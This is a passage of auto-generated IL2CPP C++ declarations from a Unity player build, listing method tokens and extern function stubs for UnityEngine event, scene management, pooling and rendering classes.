// 0x00000749 System.Void UnityEngine.Events.InvokableCall`1::remove_Delegate(UnityEngine.Events.UnityAction`1<T1>)
// 0x0000074A System.Void UnityEngine.Events.InvokableCall`1::.ctor(System.Object,System.Reflection.MethodInfo)
// 0x0000074B System.Void UnityEngine.Events.InvokableCall`1::.ctor(UnityEngine.Events.UnityAction`1<T1>)
// 0x0000074C System.Void UnityEngine.Events.InvokableCall`1::Invoke(System.Object[])
// 0x0000074D System.Void UnityEngine.Events.InvokableCall`1::Invoke(T1)
// 0x0000074E System.Boolean UnityEngine.Events.InvokableCall`1::Find(System.Object,System.Reflection.MethodInfo)
// 0x0000074F System.Void UnityEngine.Events.InvokableCall`2::.ctor(System.Object,System.Reflection.MethodInfo)
// 0x00000750 System.Void UnityEngine.Events.InvokableCall`2::Invoke(System.Object[])
// 0x00000751 System.Void UnityEngine.Events.InvokableCall`2::Invoke(T1,T2)
// 0x00000752 System.Boolean UnityEngine.Events.InvokableCall`2::Find(System.Object,System.Reflection.MethodInfo)
// 0x00000753 System.Void UnityEngine.Events.InvokableCall`3::.ctor(System.Object,System.Reflection.MethodInfo)
// 0x00000754 System.Void UnityEngine.Events.InvokableCall`3::Invoke(System.Object[])
// 0x00000755 System.Void UnityEngine.Events.InvokableCall`3::Invoke(T1,T2,T3)
// 0x00000756 System.Boolean UnityEngine.Events.InvokableCall`3::Find(System.Object,System.Reflection.MethodInfo)
// 0x00000757 System.Void UnityEngine.Events.InvokableCall`4::.ctor(System.Object,System.Reflection.MethodInfo)
// 0x00000758 System.Void UnityEngine.Events.InvokableCall`4::Invoke(System.Object[])
// 0x00000759 System.Boolean UnityEngine.Events.InvokableCall`4::Find(System.Object,System.Reflection.MethodInfo)
// 0x0000075A System.Void UnityEngine.Events.CachedInvokableCall`1::.ctor(UnityEngine.Object,System.Reflection.MethodInfo,T)
// 0x0000075B System.Void UnityEngine.Events.CachedInvokableCall`1::Invoke(System.Object[])
// 0x0000075C System.Void UnityEngine.Events.CachedInvokableCall`1::Invoke(T)
// 0x0000075D UnityEngine.Object UnityEngine.Events.PersistentCall::get_target()
extern void PersistentCall_get_target_mA12C3C9A21F6F5335761CB0EB3C7C965D8C393AE (void);
// 0x0000075E System.String UnityEngine.Events.PersistentCall::get_targetAssemblyTypeName()
extern void PersistentCall_get_targetAssemblyTypeName_m303DE56BDE5CD469D0210E1EA73F54B4C88228BE (void);
// 0x0000075F System.String UnityEngine.Events.PersistentCall::get_methodName()
extern void PersistentCall_get_methodName_mFD7F88289C9EF5DE6D7EFD3FEF1A5C640CBAF088 (void);
// 0x00000760 UnityEngine.Events.PersistentListenerMode UnityEngine.Events.PersistentCall::get_mode()
extern void PersistentCall_get_mode_m3FFA4D4FC3DA0C38106323CD33ABBFA53ED01928 (void);
// 0x00000761 UnityEngine.Events.ArgumentCache UnityEngine.Events.PersistentCall::get_arguments()
extern void PersistentCall_get_arguments_mA3B29A1F4E7328523674ADC6FC0C7332BA053410 (void);
// 0x00000762 System.Boolean UnityEngine.Events.PersistentCall::IsValid()
extern void PersistentCall_IsValid_mD63347854BC781710D4CC9B5FC3C3996E84A325D (void);
// 0x00000763 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.PersistentCall::GetRuntimeCall(UnityEngine.Events.UnityEventBase)
extern void PersistentCall_GetRuntimeCall_m0DDE14D286D9995CCE65D2DFF27D57E4D476F072 (void);
// 0x00000764 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.PersistentCall::GetObjectCall(UnityEngine.Object,System.Reflection.MethodInfo,UnityEngine.Events.ArgumentCache)
extern void PersistentCall_GetObjectCall_m7474F59CE8CF8F473B55058DD432FB9652924FC8 (void);
// 0x00000765 System.Void UnityEngine.Events.PersistentCall::OnBeforeSerialize()
extern void PersistentCall_OnBeforeSerialize_mD36FE363489E1A7C338AC7392F0DA13094825872 (void);
// 0x00000766 System.Void UnityEngine.Events.PersistentCall::OnAfterDeserialize()
extern void PersistentCall_OnAfterDeserialize_m52A9B0536D334B3C89A0A9E4D923AA212201F485 (void);
// 0x00000767 System.Void UnityEngine.Events.PersistentCall::.ctor()
extern void PersistentCall__ctor_m6EE5F241C45D97046ECAFCF45FB0DE96E7827142 (void);
// 0x00000768 System.Void UnityEngine.Events.PersistentCallGroup::.ctor()
extern void PersistentCallGroup__ctor_m1B17318026E3D419B2C194F66882E3BED6C4200A (void);
// 0x00000769 System.Void UnityEngine.Events.PersistentCallGroup::Initialize(UnityEngine.Events.InvokableCallList,UnityEngine.Events.UnityEventBase)
extern void PersistentCallGroup_Initialize_m937649041F14D0D20F959B07BA099246EC32BCCB (void);
// 0x0000076A System.Void UnityEngine.Events.InvokableCallList::AddPersistentInvokableCall(UnityEngine.Events.BaseInvokableCall)
extern void InvokableCallList_AddPersistentInvokableCall_mFB82EE201D90D84E0E25934EA879067BD666C0C1 (void);
// 0x0000076B System.Void UnityEngine.Events.InvokableCallList::AddListener(UnityEngine.Events.BaseInvokableCall)
extern void InvokableCallList_AddListener_m279B8BAED30DA27C305ADDF241F05CD2BC59625A (void);
// 0x0000076C System.Void UnityEngine.Events.InvokableCallList::RemoveListener(System.Object,System.Reflection.MethodInfo)
extern void InvokableCallList_RemoveListener_m5C78FE9ECE5990F29636216E879139D5863F36C8 (void);
// 0x0000076D System.Void UnityEngine.Events.InvokableCallList::ClearPersistent()
extern void InvokableCallList_ClearPersistent_m9A776CBBC13667875F1765B32B469BC12AFD4192 (void);
// 0x0000076E System.Collections.Generic.List`1<UnityEngine.Events.BaseInvokableCall> UnityEngine.Events.InvokableCallList::PrepareInvoke()
extern void InvokableCallList_PrepareInvoke_m0CF5EBCDF4913AFC13CBE09F6CFB687D0F771301 (void);
// 0x0000076F System.Void UnityEngine.Events.InvokableCallList::.ctor()
extern void InvokableCallList__ctor_mE70F25915B775E7258A12670B76C7F7B3C36BF1A (void);
// 0x00000770 System.Void UnityEngine.Events.UnityEventBase::.ctor()
extern void UnityEventBase__ctor_mB1F958EAC1A7C4B31253F2E1FED173A628725DEC (void);
// 0x00000771 System.Void UnityEngine.Events.UnityEventBase::UnityEngine.ISerializationCallbackReceiver.OnBeforeSerialize()
extern void UnityEventBase_UnityEngine_ISerializationCallbackReceiver_OnBeforeSerialize_mC47C72ED57A467E299925019E7DB9645D0F631F9 (void);
// 0x00000772 System.Void UnityEngine.Events.UnityEventBase::UnityEngine.ISerializationCallbackReceiver.OnAfterDeserialize()
extern void UnityEventBase_UnityEngine_ISerializationCallbackReceiver_OnAfterDeserialize_m835BA25C9F342C93FB9DF774C0894A82C4F049CB (void);
// 0x00000773 System.Reflection.MethodInfo UnityEngine.Events.UnityEventBase::FindMethod_Impl(System.String,System.Type)
// 0x00000774 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEventBase::GetDelegate(System.Object,System.Reflection.MethodInfo)
// 0x00000775 System.Reflection.MethodInfo UnityEngine.Events.UnityEventBase::FindMethod(UnityEngine.Events.PersistentCall)
extern void UnityEventBase_FindMethod_m0B00339CC16B63CF1C50714D018A87948FC0B23B (void);
// 0x00000776 System.Reflection.MethodInfo UnityEngine.Events.UnityEventBase::FindMethod(System.String,System.Type,UnityEngine.Events.PersistentListenerMode,System.Type)
extern void UnityEventBase_FindMethod_mE417FEA28EC49921FA28EBDAB1214B0E6EC7E91B (void);
// 0x00000777 System.Void UnityEngine.Events.UnityEventBase::DirtyPersistentCalls()
extern void UnityEventBase_DirtyPersistentCalls_m356D77B4849FC63501507E4D3F1054BD86D6B1CF (void);
// 0x00000778 System.Void UnityEngine.Events.UnityEventBase::RebuildPersistentCallsIfNeeded()
extern void UnityEventBase_RebuildPersistentCallsIfNeeded_m981B8A6658A88F620345D2C7F4ADCD0D788B0266 (void);
// 0x00000779 System.Void UnityEngine.Events.UnityEventBase::AddCall(UnityEngine.Events.BaseInvokableCall)
extern void UnityEventBase_AddCall_mA78C058ED530789A28F42347B653190FEC84DBBC (void);
// 0x0000077A System.Void UnityEngine.Events.UnityEventBase::RemoveListener(System.Object,System.Reflection.MethodInfo)
extern void UnityEventBase_RemoveListener_mFF8F8FAD5F18BA872C3CE005DC134B6828E1AD3B (void);
// 0x0000077B System.Collections.Generic.List`1<UnityEngine.Events.BaseInvokableCall> UnityEngine.Events.UnityEventBase::PrepareInvoke()
extern void UnityEventBase_PrepareInvoke_m4D04FA5D7025C093047DCD3DFEEFB9DF48764FC2 (void);
// 0x0000077C System.String UnityEngine.Events.UnityEventBase::ToString()
extern void UnityEventBase_ToString_mE86F29D699C7537CACCAF3945F797EE659CE6522 (void);
// 0x0000077D System.Reflection.MethodInfo UnityEngine.Events.UnityEventBase::GetValidMethodInfo(System.Type,System.String,System.Type[])
extern void UnityEventBase_GetValidMethodInfo_m8507658F478F269090B0F2CBC9CA535B8A459FBA (void);
// 0x0000077E System.Void UnityEngine.Events.UnityAction::.ctor(System.Object,System.IntPtr)
extern void UnityAction__ctor_mC53E20D6B66E0D5688CD81B88DBB34F5A58B7131 (void);
// 0x0000077F System.Void UnityEngine.Events.UnityAction::Invoke()
extern void UnityAction_Invoke_m5CB9EE17CCDF64D00DE5D96DF3553CDB20D66F70 (void);
// 0x00000780 System.Void UnityEngine.Events.UnityEvent::.ctor()
extern void UnityEvent__ctor_m03D3E5121B9A6100351984D0CE3050B909CD3235 (void);
// 0x00000781 System.Void UnityEngine.Events.UnityEvent::AddListener(UnityEngine.Events.UnityAction)
extern void UnityEvent_AddListener_m8AA4287C16628486B41DA41CA5E7A856A706D302 (void);
// 0x00000782 System.Void UnityEngine.Events.UnityEvent::RemoveListener(UnityEngine.Events.UnityAction)
extern void UnityEvent_RemoveListener_m0E138F5575CB4363019D3DA570E98FAD502B812C (void);
// 0x00000783 System.Reflection.MethodInfo UnityEngine.Events.UnityEvent::FindMethod_Impl(System.String,System.Type)
extern void UnityEvent_FindMethod_Impl_m62E3D2795BACFF1BA2ED6A431ABD5FB2C7D3D681 (void);
// 0x00000784 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent::GetDelegate(System.Object,System.Reflection.MethodInfo)
extern void UnityEvent_GetDelegate_m6665C6282D3668BC57F2702FD0C3B108F4CFD226 (void);
// 0x00000785 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent::GetDelegate(UnityEngine.Events.UnityAction)
extern void UnityEvent_GetDelegate_m4D67DA17E33F760CC6AAEDE11C7B896C7BD6DBEC (void);
// 0x00000786 System.Void UnityEngine.Events.UnityEvent::Invoke()
extern void UnityEvent_Invoke_mFBF80D59B03C30C5FE6A06F897D954ACADE061D2 (void);
// 0x00000787 System.Void UnityEngine.Events.UnityAction`1::.ctor(System.Object,System.IntPtr)
// 0x00000788 System.Void UnityEngine.Events.UnityAction`1::Invoke(T0)
// 0x00000789 System.Void UnityEngine.Events.UnityEvent`1::.ctor()
// 0x0000078A System.Void UnityEngine.Events.UnityEvent`1::AddListener(UnityEngine.Events.UnityAction`1<T0>)
// 0x0000078B System.Void UnityEngine.Events.UnityEvent`1::RemoveListener(UnityEngine.Events.UnityAction`1<T0>)
// 0x0000078C System.Reflection.MethodInfo UnityEngine.Events.UnityEvent`1::FindMethod_Impl(System.String,System.Type)
// 0x0000078D UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent`1::GetDelegate(System.Object,System.Reflection.MethodInfo)
// 0x0000078E UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent`1::GetDelegate(UnityEngine.Events.UnityAction`1<T0>)
// 0x0000078F System.Void UnityEngine.Events.UnityEvent`1::Invoke(T0)
// 0x00000790 System.Void UnityEngine.Events.UnityAction`2::.ctor(System.Object,System.IntPtr)
// 0x00000791 System.Void UnityEngine.Events.UnityAction`2::Invoke(T0,T1)
// 0x00000792 System.Void UnityEngine.Events.UnityEvent`2::.ctor()
// 0x00000793 System.Reflection.MethodInfo UnityEngine.Events.UnityEvent`2::FindMethod_Impl(System.String,System.Type)
// 0x00000794 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent`2::GetDelegate(System.Object,System.Reflection.MethodInfo)
// 0x00000795 System.Void UnityEngine.Events.UnityEvent`2::Invoke(T0,T1)
// 0x00000796 System.Void UnityEngine.Events.UnityAction`3::.ctor(System.Object,System.IntPtr)
// 0x00000797 System.Void UnityEngine.Events.UnityAction`3::Invoke(T0,T1,T2)
// 0x00000798 System.Void UnityEngine.Events.UnityEvent`3::.ctor()
// 0x00000799 System.Reflection.MethodInfo UnityEngine.Events.UnityEvent`3::FindMethod_Impl(System.String,System.Type)
// 0x0000079A UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent`3::GetDelegate(System.Object,System.Reflection.MethodInfo)
// 0x0000079B System.Void UnityEngine.Events.UnityEvent`3::Invoke(T0,T1,T2)
// 0x0000079C System.Void UnityEngine.Events.UnityAction`4::.ctor(System.Object,System.IntPtr)
// 0x0000079D System.Void UnityEngine.Events.UnityAction`4::Invoke(T0,T1,T2,T3)
// 0x0000079E System.Void UnityEngine.Events.UnityEvent`4::.ctor()
// 0x0000079F System.Reflection.MethodInfo UnityEngine.Events.UnityEvent`4::FindMethod_Impl(System.String,System.Type)
// 0x000007A0 UnityEngine.Events.BaseInvokableCall UnityEngine.Events.UnityEvent`4::GetDelegate(System.Object,System.Reflection.MethodInfo)
// 0x000007A1 System.Void UnityEngine.Serialization.FormerlySerializedAsAttribute::.ctor(System.String)
extern void FormerlySerializedAsAttribute__ctor_mD7361D52007EF623D139A726F892198E089F3C9D (void);
// 0x000007A2 System.Void UnityEngine.Scripting.AlwaysLinkAssemblyAttribute::.ctor()
extern void AlwaysLinkAssemblyAttribute__ctor_m4F7CEB8C9B82C4F3DB440C4D596BD8954B84D496 (void);
// 0x000007A3 System.Void UnityEngine.Scripting.PreserveAttribute::.ctor()
extern void PreserveAttribute__ctor_mF9E65066D9317F56C6F4AE274A1E2D55D6A62F96 (void);
// 0x000007A4 System.Void UnityEngine.Scripting.APIUpdating.MovedFromAttributeData::Set(System.Boolean,System.String,System.String,System.String)
extern void MovedFromAttributeData_Set_m155005FB8BCE0569C40B02D75FFADB3FBDB7EEDD (void);
// 0x000007A5 System.Void UnityEngine.Scripting.APIUpdating.MovedFromAttribute::.ctor(System.Boolean,System.String,System.String,System.String)
extern void MovedFromAttribute__ctor_m1B944ED92ED635A19DD4E82765BC0200C0BF3E4D (void);
// 0x000007A6 System.Void UnityEngine.Scripting.APIUpdating.MovedFromAttribute::.ctor(System.String)
extern void MovedFromAttribute__ctor_mFDCCBD975A9BCC410529DB2B7C01659ACF8005CC (void);
// 0x000007A7 System.String UnityEngine.SceneManagement.Scene::GetPathInternal(System.Int32)
extern void Scene_GetPathInternal_m172956BAA9F3FF754E3F4506E9C7404B5E5741AD (void);
// 0x000007A8 System.Int32 UnityEngine.SceneManagement.Scene::GetBuildIndexInternal(System.Int32)
extern void Scene_GetBuildIndexInternal_mE6E8F796728DEF0CCC34B5E45068F0C834089E28 (void);
// 0x000007A9 System.Int32 UnityEngine.SceneManagement.Scene::get_handle()
extern void Scene_get_handle_mD508BE60333C6168610E12CECAB12E9B11C25E53 (void);
// 0x000007AA System.String UnityEngine.SceneManagement.Scene::get_path()
extern void Scene_get_path_mACD61B36E1F010A9FCA2C62637E0CB24B16729E4 (void);
// 0x000007AB System.Int32 UnityEngine.SceneManagement.Scene::get_buildIndex()
extern void Scene_get_buildIndex_m82B6E0C96C85C952B7A2D794DB73CDA99AA9A57E (void);
// 0x000007AC System.Int32 UnityEngine.SceneManagement.Scene::GetHashCode()
extern void Scene_GetHashCode_m74ACBFB8C656D5620A9A1E62D04E55ACBF63ADC9 (void);
// 0x000007AD System.Boolean UnityEngine.SceneManagement.Scene::Equals(System.Object)
extern void Scene_Equals_mB973481492F291BF8EAF1AD66B9F7FA3ACF3928D (void);
// 0x000007AE System.Int32 UnityEngine.SceneManagement.SceneManagerAPIInternal::GetNumScenesInBuildSettings()
extern void SceneManagerAPIInternal_GetNumScenesInBuildSettings_m76F90158FAE4EB4F6983D4023B33DEE8F5C0B1BF (void);
// 0x000007AF UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManagerAPIInternal::GetSceneByBuildIndex(System.Int32)
extern void SceneManagerAPIInternal_GetSceneByBuildIndex_m73A59D056D005E9B07368895285E02B44DE07384 (void);
// 0x000007B0 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManagerAPIInternal::LoadSceneAsyncNameIndexInternal(System.String,System.Int32,UnityEngine.SceneManagement.LoadSceneParameters,System.Boolean)
extern void SceneManagerAPIInternal_LoadSceneAsyncNameIndexInternal_m5FF3A8B53DD6A031DC52C167903AE4528391FE11 (void);
// 0x000007B1 System.Void UnityEngine.SceneManagement.SceneManagerAPIInternal::GetSceneByBuildIndex_Injected(System.Int32,UnityEngine.SceneManagement.Scene&)
extern void SceneManagerAPIInternal_GetSceneByBuildIndex_Injected_mA2E9BE0F2098BA798B58CFB7C4FDE863B823556C (void);
// 0x000007B2 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManagerAPIInternal::LoadSceneAsyncNameIndexInternal_Injected(System.String,System.Int32,UnityEngine.SceneManagement.LoadSceneParameters&,System.Boolean)
extern void SceneManagerAPIInternal_LoadSceneAsyncNameIndexInternal_Injected_mDEDFF3267DE3357E8F2D154053D25A2FBE2D2AFD (void);
// 0x000007B3 UnityEngine.SceneManagement.SceneManagerAPI UnityEngine.SceneManagement.SceneManagerAPI::get_ActiveAPI()
extern void SceneManagerAPI_get_ActiveAPI_m720FAACCF2718020292060003E7331B19AEB5FA8 (void);
// 0x000007B4 UnityEngine.SceneManagement.SceneManagerAPI UnityEngine.SceneManagement.SceneManagerAPI::get_overrideAPI()
extern void SceneManagerAPI_get_overrideAPI_mACC4192A2014665FF7D42EAAD41AA22A71AC040E (void);
// 0x000007B5 System.Void UnityEngine.SceneManagement.SceneManagerAPI::.ctor()
extern void SceneManagerAPI__ctor_m697F6B718DCE9B5E6CA4D58BBFB0CA275E003307 (void);
// 0x000007B6 System.Int32 UnityEngine.SceneManagement.SceneManagerAPI::GetNumScenesInBuildSettings()
extern void SceneManagerAPI_GetNumScenesInBuildSettings_mDE94AA0B1EABBE1912ABAFEAD6B51B4A5A6C1135 (void);
// 0x000007B7 UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManagerAPI::GetSceneByBuildIndex(System.Int32)
extern void SceneManagerAPI_GetSceneByBuildIndex_m0F225EC4D98D2292C7B6F7EAAD205849CE292466 (void);
// 0x000007B8 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManagerAPI::LoadSceneAsyncByNameOrIndex(System.String,System.Int32,UnityEngine.SceneManagement.LoadSceneParameters,System.Boolean)
extern void SceneManagerAPI_LoadSceneAsyncByNameOrIndex_mF00A93D5BFEB82C6E11ECC77CC1534A34A6D13D4 (void);
// 0x000007B9 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManagerAPI::LoadFirstScene(System.Boolean)
extern void SceneManagerAPI_LoadFirstScene_mA4217ED8AD09C74E82DA9C10A0558AF830228E6F (void);
// 0x000007BA System.Void UnityEngine.SceneManagement.SceneManagerAPI::.cctor()
extern void SceneManagerAPI__cctor_mE1B615097421660BFC1E125F86D5DDF3F6BA7C36 (void);
// 0x000007BB System.Int32 UnityEngine.SceneManagement.SceneManager::get_sceneCount()
extern void SceneManager_get_sceneCount_mDB2658B632F95AB171E500C1519A681507B9230B (void);
// 0x000007BC System.Int32 UnityEngine.SceneManagement.SceneManager::get_sceneCountInBuildSettings()
extern void SceneManager_get_sceneCountInBuildSettings_m7C49222A2A771B11C1CAD7D743BDDF8F8F39E685 (void);
// 0x000007BD UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManager::GetActiveScene()
extern void SceneManager_GetActiveScene_m2DB2A1ACB84805968A4B6396BFDFB92C0AF32BCE (void);
// 0x000007BE UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManager::GetSceneByBuildIndex(System.Int32)
extern void SceneManager_GetSceneByBuildIndex_m40D28B1DFB350909B150D66BA90C704E2A4AE548 (void);
// 0x000007BF UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManager::GetSceneAt(System.Int32)
extern void SceneManager_GetSceneAt_m5444433E1CD78FC2E573330630000B5A73E0FBF4 (void);
// 0x000007C0 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManager::LoadSceneAsyncNameIndexInternal(System.String,System.Int32,UnityEngine.SceneManagement.LoadSceneParameters,System.Boolean)
extern void SceneManager_LoadSceneAsyncNameIndexInternal_m32EDF87979243BB1343585D146461C329D065A5D (void);
// 0x000007C1 UnityEngine.AsyncOperation UnityEngine.SceneManagement.SceneManager::LoadFirstScene_Internal(System.Boolean)
extern void SceneManager_LoadFirstScene_Internal_mB1BB5068ACF4A10B20923DC6081C7C8664BF9864 (void);
// 0x000007C2 System.Void UnityEngine.SceneManagement.SceneManager::add_sceneLoaded(UnityEngine.Events.UnityAction`2<UnityEngine.SceneManagement.Scene,UnityEngine.SceneManagement.LoadSceneMode>)
extern void SceneManager_add_sceneLoaded_mDE45940CCEC5D17EB92EB76DB8931E5483FBCD2C (void);
// 0x000007C3 System.Void UnityEngine.SceneManagement.SceneManager::remove_sceneLoaded(UnityEngine.Events.UnityAction`2<UnityEngine.SceneManagement.Scene,UnityEngine.SceneManagement.LoadSceneMode>)
extern void SceneManager_remove_sceneLoaded_m8840CC33052C4A09A52BF927C3738A7B66783155 (void);
// 0x000007C4 System.Void UnityEngine.SceneManagement.SceneManager::add_sceneUnloaded(UnityEngine.Events.UnityAction`1<UnityEngine.SceneManagement.Scene>)
extern void SceneManager_add_sceneUnloaded_mDFA2FD86D583E308417C3FF7753C92AAE11B99FA (void);
// 0x000007C5 System.Void UnityEngine.SceneManagement.SceneManager::remove_sceneUnloaded(UnityEngine.Events.UnityAction`1<UnityEngine.SceneManagement.Scene>)
extern void SceneManager_remove_sceneUnloaded_mAE3FCD9113413A6B067527A0D2B01525CC5D631A (void);
// 0x000007C6 System.Void UnityEngine.SceneManagement.SceneManager::LoadScene(System.Int32)
extern void SceneManager_LoadScene_mE00D17D79AD74B307F913BBF296A36115548DB6D (void);
// 0x000007C7 UnityEngine.SceneManagement.Scene UnityEngine.SceneManagement.SceneManager::LoadScene(System.Int32,UnityEngine.SceneManagement.LoadSceneParameters)
extern void SceneManager_LoadScene_m0E137F74CF4CC01BBF43BE81BAA6CAD4DB7BDE96 (void);
// 0x000007C8 System.Void UnityEngine.SceneManagement.SceneManager::Internal_SceneLoaded(UnityEngine.SceneManagement.Scene,UnityEngine.SceneManagement.LoadSceneMode)
extern void SceneManager_Internal_SceneLoaded_m52ABA92450E2B7A640C528A705E7322011A7E7CF (void);
// 0x000007C9 System.Void UnityEngine.SceneManagement.SceneManager::Internal_SceneUnloaded(UnityEngine.SceneManagement.Scene)
extern void SceneManager_Internal_SceneUnloaded_mAF39D5EE712D0079C20265D76D9366A0CA9A2703 (void);
// 0x000007CA System.Void UnityEngine.SceneManagement.SceneManager::Internal_ActiveSceneChanged(UnityEngine.SceneManagement.Scene,UnityEngine.SceneManagement.Scene)
extern void SceneManager_Internal_ActiveSceneChanged_m4BDBF7BD76501274A60D37D3EAB47002BA96A3D3 (void);
// 0x000007CB System.Void UnityEngine.SceneManagement.SceneManager::.cctor()
extern void SceneManager__cctor_mA9975EBD8A8F5463A87A1341C6366631E1CC9267 (void);
// 0x000007CC System.Void UnityEngine.SceneManagement.SceneManager::GetActiveScene_Injected(UnityEngine.SceneManagement.Scene&)
extern void SceneManager_GetActiveScene_Injected_m8E7E24846A3B781AEBB4D189E6EDE3533AE6BF1B (void);
// 0x000007CD System.Void UnityEngine.SceneManagement.SceneManager::GetSceneAt_Injected(System.Int32,UnityEngine.SceneManagement.Scene&)
extern void SceneManager_GetSceneAt_Injected_mA38EDB6E1570DD59582AE345851F3BAB5E9D6AAF (void);
// 0x000007CE System.Void UnityEngine.SceneManagement.LoadSceneParameters::.ctor(UnityEngine.SceneManagement.LoadSceneMode)
extern void LoadSceneParameters__ctor_m40C160638049BF7577055B3460968F8B73459380 (void);
// 0x000007CF System.String UnityEngine.LowLevel.PlayerLoopSystem::ToString()
extern void PlayerLoopSystem_ToString_m259B8533D2C64C15D381B16F32C710A0018684A0 (void);
// 0x000007D0 System.Void UnityEngine.LowLevel.PlayerLoopSystem/UpdateFunction::.ctor(System.Object,System.IntPtr)
extern void UpdateFunction__ctor_m0D1D766F22D02176396DA6745A60EA046EE8227B (void);
// 0x000007D1 System.Void UnityEngine.LowLevel.PlayerLoopSystem/UpdateFunction::Invoke()
extern void UpdateFunction_Invoke_m9BCEE4E5BEE924EB804DA64314B78D0E831C179B (void);
// 0x000007D2 TCollection UnityEngine.Pool.CollectionPool`2::Get()
// 0x000007D3 System.Void UnityEngine.Pool.CollectionPool`2::Release(TCollection)
// 0x000007D4 System.Void UnityEngine.Pool.CollectionPool`2::.cctor()
// 0x000007D5 System.Void UnityEngine.Pool.CollectionPool`2/<>c::.cctor()
// 0x000007D6 System.Void UnityEngine.Pool.CollectionPool`2/<>c::.ctor()
// 0x000007D7 TCollection UnityEngine.Pool.CollectionPool`2/<>c::<.cctor>b__5_0()
// 0x000007D8 System.Void UnityEngine.Pool.CollectionPool`2/<>c::<.cctor>b__5_1(TCollection)
// 0x000007D9 System.Int32 UnityEngine.Pool.ObjectPool`1::get_CountAll()
// 0x000007DA System.Void UnityEngine.Pool.ObjectPool`1::set_CountAll(System.Int32)
// 0x000007DB System.Int32 UnityEngine.Pool.ObjectPool`1::get_CountInactive()
// 0x000007DC System.Void UnityEngine.Pool.ObjectPool`1::.ctor(System.Func`1<T>,System.Action`1<T>,System.Action`1<T>,System.Action`1<T>,System.Boolean,System.Int32,System.Int32)
// 0x000007DD T UnityEngine.Pool.ObjectPool`1::Get()
// 0x000007DE System.Void UnityEngine.Pool.ObjectPool`1::Release(T)
// 0x000007DF System.Void UnityEngine.Pool.ObjectPool`1::Clear()
// 0x000007E0 System.Void UnityEngine.Pool.ObjectPool`1::Dispose()
// 0x000007E1 System.Void UnityEngine.Internal.DefaultValueAttribute::.ctor(System.String)
extern void DefaultValueAttribute__ctor_mC1104F2F0A2CD67CE308CD7E5C1CCE74482C1BB4 (void);
// 0x000007E2 System.Object UnityEngine.Internal.DefaultValueAttribute::get_Value()
extern void DefaultValueAttribute_get_Value_m8FC7A517D291CDDB7B5D17E811F5CB11FCF59D24 (void);
// 0x000007E3 System.Boolean UnityEngine.Internal.DefaultValueAttribute::Equals(System.Object)
extern void DefaultValueAttribute_Equals_m6E5B33344C4FD2FC4775A657481B63F82F18B925 (void);
// 0x000007E4 System.Int32 UnityEngine.Internal.DefaultValueAttribute::GetHashCode()
extern void DefaultValueAttribute_GetHashCode_m6F99553C7E76E711DCA6368417F66898F5AF6359 (void);
// 0x000007E5 System.Void UnityEngine.Internal.ExcludeFromDocsAttribute::.ctor()
extern void ExcludeFromDocsAttribute__ctor_mF280A16634D72D09D550C2BA2294D9234D50C771 (void);
// 0x000007E6 System.Boolean UnityEngine.Rendering.CameraEventUtils::IsValid(UnityEngine.Rendering.CameraEvent)
extern void CameraEventUtils_IsValid_m48FE26938285FFC26EE178ED871E28A80FB23ACB (void);
// 0x000007E7 UnityEngine.Rendering.VertexAttribute UnityEngine.Rendering.VertexAttributeDescriptor::get_attribute()
extern void VertexAttributeDescriptor_get_attribute_m2F7C7084857741A39E9FF0D4BABF98F9C7018AAA (void);
// 0x000007E8 System.Void UnityEngine.Rendering.VertexAttributeDescriptor::set_attribute(UnityEngine.Rendering.VertexAttribute)
extern void VertexAttributeDescriptor_set_attribute_m526ED099EEA12DCB2FCB1BC88445FBF921E850A2 (void);
// 0x000007E9 UnityEngine.Rendering.VertexAttributeFormat UnityEngine.Rendering.VertexAttributeDescriptor::get_format()
extern void VertexAttributeDescriptor_get_format_mF8EF98F3E047BC26D177C3A008BCDAF979E52C79 (void);
// 0x000007EA System.Void UnityEngine.Rendering.VertexAttributeDescriptor::set_format(UnityEngine.Rendering.VertexAttributeFormat)
extern void VertexAttributeDescriptor_set_format_mCA82263EBD7802621D9ECE42D0F44D4AAECD46C5 (void);
// 0x000007EB System.Int32 UnityEngine.Rendering.VertexAttributeDescriptor::get_dimension()
extern void VertexAttributeDescriptor_get_dimension_mAB440DDFA08BF61D717547EC8B9C43C3DFC56FB8 (void);
// 0x000007EC System.Void UnityEngine.Rendering.VertexAttributeDescriptor::set_dimension(System.Int32)
extern void VertexAttributeDescriptor_set_dimension_mEF4325AE27221C732B214354A2DEB044ACFC69EE (void);
// 0x000007ED System.Int32 UnityEngine.Rendering.VertexAttributeDescriptor::get_stream()
extern void VertexAttributeDescriptor_get_stream_mAA4D41E2B4B9024161B176700100ADB27855E4FF (void);
// 0x000007EE System.Void UnityEngine.Rendering.VertexAttributeDescriptor::set_stream(System.Int32)
extern void VertexAttributeDescriptor_set_stream_m9A3991AA0365A1DCEDF80A61990F7B48913A1C0A (void);
// 0x000007EF System.Void UnityEngine.Rendering.VertexAttributeDescriptor::.ctor(UnityEngine.Rendering.VertexAttribute,UnityEngine.Rendering.VertexAttributeFormat,System.Int32,System.Int32)
extern void VertexAttributeDescriptor__ctor_m713B31395FB13FDEB2665F5C4C31572D5875A43A (void);
// 0x000007F0 System.String UnityEngine.Rendering.VertexAttributeDescriptor::ToString()
extern void VertexAttributeDescriptor_ToString_m45F7E7D6715E000C617173246F2C9BE23DF3FC8F (void);
// 0x000007F1 System.Int32 UnityEngine.Rendering.VertexAttributeDescriptor::GetHashCode()
